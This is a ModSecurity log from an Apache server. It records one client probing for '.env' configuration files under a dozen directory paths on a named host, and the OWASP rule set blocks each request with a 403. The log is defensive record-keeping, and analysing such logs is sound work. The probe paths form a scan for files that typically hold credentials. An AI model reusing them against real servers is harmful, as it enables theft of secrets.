[Mon May 11 17:22:54.246688 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlQAAAAI"]
[Mon May 11 17:22:54.247215 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlQAAAAI"]
[Mon May 11 17:22:54.247443 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlQAAAAI"]
[Mon May 11 17:22:54.401655 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlwAAAAI"]
[Mon May 11 17:22:54.402053 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlwAAAAI"]
[Mon May 11 17:22:54.402267 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlwAAAAI"]
[Mon May 11 17:22:54.556353 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmQAAAAI"]
[Mon May 11 17:22:54.556825 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmQAAAAI"]
[Mon May 11 17:22:54.557031 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmQAAAAI"]
[Mon May 11 17:22:54.712233 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmgAAAAI"]
[Mon May 11 17:22:54.712703 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmgAAAAI"]
[Mon May 11 17:22:54.712910 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmgAAAAI"]
[Mon May 11 17:22:54.867867 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmwAAAAI"]
[Mon May 11 17:22:54.868609 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmwAAAAI"]
[Mon May 11 17:22:54.868949 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNmwAAAAI"]
[Mon May 11 17:22:55.024688 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNnAAAAAI"]
[Mon May 11 17:22:55.025433 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNnAAAAAI"]
[Mon May 11 17:22:55.025751 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNnAAAAAI"]
[Mon May 11 17:22:55.179734 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNngAAAAI"]
[Mon May 11 17:22:55.180228 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNngAAAAI"]
[Mon May 11 17:22:55.180445 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNngAAAAI"]
[Mon May 11 17:22:55.334772 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNnwAAAAI"]
[Mon May 11 17:22:55.335291 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNnwAAAAI"]
[Mon May 11 17:22:55.335538 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNnwAAAAI"]
[Mon May 11 17:22:55.490119 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNoAAAAAI"]
[Mon May 11 17:22:55.490577 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNoAAAAAI"]
[Mon May 11 17:22:55.490799 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNoAAAAAI"]
[Mon May 11 17:22:55.647740 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNoQAAAAI"]
[Mon May 11 17:22:55.648248 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNoQAAAAI"]
[Mon May 11 17:22:55.648481 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNoQAAAAI"]
[Mon May 11 17:22:55.802500 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNogAAAAI"]
[Mon May 11 17:22:55.802983 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNogAAAAI"]
[Mon May 11 17:22:55.803235 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNogAAAAI"]
[Mon May 11 17:22:55.959425 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNowAAAAI"]
[Mon May 11 17:22:55.959938 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNowAAAAI"]
[Mon May 11 17:22:55.960168 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agH0Tw-Qm4vhlWBPlMjNowAAAAI"]
[Mon May 11 17:22:56.114473 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpAAAAAI"]
[Mon May 11 17:22:56.114977 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpAAAAAI"]
[Mon May 11 17:22:56.115219 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agH0UA-Qm4vhlWBPlMjNpAAAAAI"]
